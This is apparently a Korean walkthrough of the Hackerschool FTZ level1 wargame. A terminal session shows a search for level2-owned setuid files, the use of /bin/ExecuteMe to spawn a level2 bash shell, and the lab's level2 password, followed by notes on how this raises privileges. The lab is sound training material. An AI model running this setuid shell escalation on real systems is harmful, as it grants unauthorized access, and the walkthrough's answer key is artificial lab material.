해커스쿨 FTZ level1

login as: level1
level1@192.168.244.128's password:
[level1@ftz level1]$ ls
hint  public_html  tmp
[level1@ftz level1]$ cd hint
-bash: cd: hint: Not a directory
[level1@ftz level1]$ clear
[level1@ftz level1]$ ls
hint  public_html  tmp
[level1@ftz level1]$ cat hint
 
 
level2 권한에 setuid가 걸린 파일을 찾는다.
 
 
[level1@ftz level1]$ find / -user level2 -perm -4000
find: /lost+found: Permission denied
find: /boot/lost+found: Permission denied
find: /proc/1/fd: Permission denied
find: /proc/2/fd: Permission denied
find: /proc/3/fd: Permission denied
find: /proc/4/fd: Permission denied
find: /proc/9/fd: Permission denied
find: /proc/5/fd: Permission denied
find: /proc/6/fd: Permission denied
find: /proc/7/fd: Permission denied
find: /proc/8/fd: Permission denied
find: /proc/10/fd: Permission denied
find: /proc/11/fd: Permission denied
find: /proc/19/fd: Permission denied
find: /proc/77/fd: Permission denied
find: /proc/1165/fd: Permission denied
find: /proc/1474/fd: Permission denied
find: /proc/1530/fd: Permission denied
find: /proc/1534/fd: Permission denied
find: /proc/1552/fd: Permission denied
find: /proc/1571/fd: Permission denied
find: /proc/1638/fd: Permission denied
find: /proc/1675/fd: Permission denied
find: /proc/1709/fd: Permission denied
find: /proc/1718/fd: Permission denied
find: /proc/1728/fd: Permission denied
find: /proc/1737/fd: Permission denied
find: /proc/1746/fd: Permission denied
find: /proc/1767/fd: Permission denied
find: /proc/1782/fd: Permission denied
find: /proc/1812/fd: Permission denied
find: /proc/1824/fd: Permission denied
find: /proc/.1825/fd: Permission denied
find: /proc/.1826/fd: Permission denied
find: /proc/.1827/fd: Permission denied
find: /proc/.1828/fd: Permission denied
find: /proc/.1829/fd: Permission denied
find: /proc/.1830/fd: Permission denied
find: /proc/.1831/fd: Permission denied
find: /proc/.1832/fd: Permission denied
find: /proc/1877/fd: Permission denied
find: /proc/1878/fd: Permission denied
find: /proc/1879/fd: Permission denied
find: /proc/1880/fd: Permission denied
find: /proc/1881/fd: Permission denied
find: /proc/1882/fd: Permission denied
find: /proc/1883/fd: Permission denied
find: /proc/1884/fd: Permission denied
find: /proc/2234/fd: Permission denied
find: /proc/2236/fd: Permission denied
find: /var/lib/slocate: Permission denied
find: /var/lib/nfs/statd: Permission denied
find: /var/lib/dav: Permission denied
find: /var/lib/mysql/mysql: Permission denied
find: /var/lib/mysql/test: Permission denied
find: /var/lib/pgsql: Permission denied
find: /var/log/httpd: Permission denied
find: /var/log/squid: Permission denied
find: /var/log/samba: Permission denied
find: /var/cache/mod_ssl: Permission denied
find: /var/cache/alchemist/printconf.rpm: Permission denied
find: /var/cache/alchemist/printconf.local: Permission denied
find: /var/run/sudo: Permission denied
find: /var/spool/at: Permission denied
find: /var/spool/clientmqueue: Permission denied
find: /var/spool/mqueue: Permission denied
find: /var/spool/cron: Permission denied
find: /var/spool/squid: Permission denied
find: /var/empty/sshd: Permission denied
find: /var/tux: Permission denied
find: /tmp/cgn5EpxN: Permission denied
find: /etc/sysconfig/pgsql: Permission denied
find: /etc/default: Permission denied
find: /etc/httpd/conf/ssl.crl: Permission denied
find: /etc/httpd/conf/ssl.crt: Permission denied
find: /etc/httpd/conf/ssl.csr: Permission denied
find: /etc/httpd/conf/ssl.key: Permission denied
find: /etc/httpd/conf/ssl.prm: Permission denied
find: /root: Permission denied
find: /usr/share/ssl/CA: Permission denied
/bin/ExecuteMe
find: /home/clear: Permission denied
find: /home/level10/program: Permission denied
find: /home/level5/tmp: Permission denied
find: /home/trainer1: Permission denied
find: /home/trainer10: Permission denied
find: /home/trainer2: Permission denied
find: /home/trainer3: Permission denied
find: /home/trainer4: Permission denied
find: /home/trainer5: Permission denied
find: /home/trainer6: Permission denied
find: /home/trainer7: Permission denied
find: /home/trainer8: Permission denied
find: /home/trainer9: Permission denied
[level1@ftz level1]$ ls -al /bin/ExecuteMe
-rwsr-x---    1 level2   level1      12868 Sep 10  2011 /bin/ExecuteMe
[level1@ftz level1]$ file /bin/ExecuteMe
/bin/ExecuteMe: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped
[level1@ftz level1]$ cd /bin
[level1@ftz bin]$ ExecuteMe
 
 

                레벨 2의 권한으로 당신이 원하는 명령어를
                한가지 실행시켜 드리겠습니다.
                (단, my-pass나 chmod는 제외)
 
                어떤 명령을 실행시키겠습니까?
 
 
                [level2@ftz level2]$ bash
 
 
[level2@ftz level2]$ my-pass
 
Level2 Password is "hacker or cracker". 

find / -user level2 -perm 4000 : 루트에서부터 SetUID(4000)가 설정되어 level2 user의 소유자권한을 빌려와서 실행되는 파일을 찾는다.

file : file type을 확인하는 명령어

shell(쉘): 사용자가 입력한 명령을 해석하여 대신 실행해주는 인터페이스를 지닌 프로그램이다.

level2의 권한으로 bash 명령어를 사용하면 기존의 level1 권한의 쉘에서 level2 권한의 쉘이 덮어씌워지며 권한이 상승된다. 

즉, level1의 쉘은 level1이라는 user의 권한 내의 명령만 사용이 가능했다면 

level2의 쉘을 얻어냄으로써 level2라는 user의 권한이 필요한 명령이나 file에 access할 수 있게 된 것이다.

my-pass : 실제 Linux system에는 없고 해커스쿨 FTZ에만 있는 명령으로 레벨업을 위해 실행되고 있는 쉘의 user의 password를 출력하는 명령이다.